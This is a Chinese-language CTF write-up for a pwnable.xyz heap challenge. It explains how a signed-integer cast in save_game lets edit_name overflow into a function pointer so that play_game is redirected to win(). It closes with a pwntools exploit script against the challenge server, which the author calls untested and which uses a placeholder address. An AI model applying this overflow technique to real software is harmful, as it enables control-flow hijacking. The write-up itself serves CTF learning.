0x1,概述。
这道题漏洞主要在于函数save_game函数的有符号整形使edit_name对名字长度误判导致的溢出,仔细观察save_game函数对数字格式的转换再结合堆结构可以直接发现。
0x2,具体解决方案。
先查一波保护:
具体逻辑分析:
main()通过菜单选择行为,并回应。
Play game 通过指针cur+3 实现。
关键就在于save_game():
之前init_game()函数分配0x20于save[0],分配0x10字节于*cur[0]存放初始name。
这里又分配0x20内存于save[1]存放第一个分数。
之后分析play_game()可知我们的分数保存在*cur[1]且类型为word,但在这里18行将其强制转型为有符号int并储存在save[1]。再来看一下堆的情况:
由于malloc()函数连续调用,导致cur[0]和save[0]以及save[1]内存块地址连续,当我们分数为-1时,有符号数0xffffff强制转型为qword:
edit_game()单纯测量cur(0x6032a0)长度并决定可输入字符数量.
理论我们只能对cur地址进行不超过0x10字节的输入,但只要不存在/x00,strlen()函数就继续计算字符串长度,这就意味着我们可以控制额外8字符。
即可以控制play_game()调用,修改其地址为win()。
shellcode:
from pwn import *
#Python 3.9.9
sh = remote("svc.pwnable.xyz",30009)
sh.sendafter("Name: ","A" * 0x10)
sh.sendlineafter("> ","1")
sh.sendlineafter("= ","17")
sh.sendlineafter("> ","2")
sh.sendlineafter("> ","3")
sh.send(b'A' * 0x10 + p64(Address_of_win))
sh.sendlineafter("> ","1")
print(sh.recv())
代码未经测试,仅供参考。
0x3,总结。
这题也不难,仔细审计代码和数据结构是关键。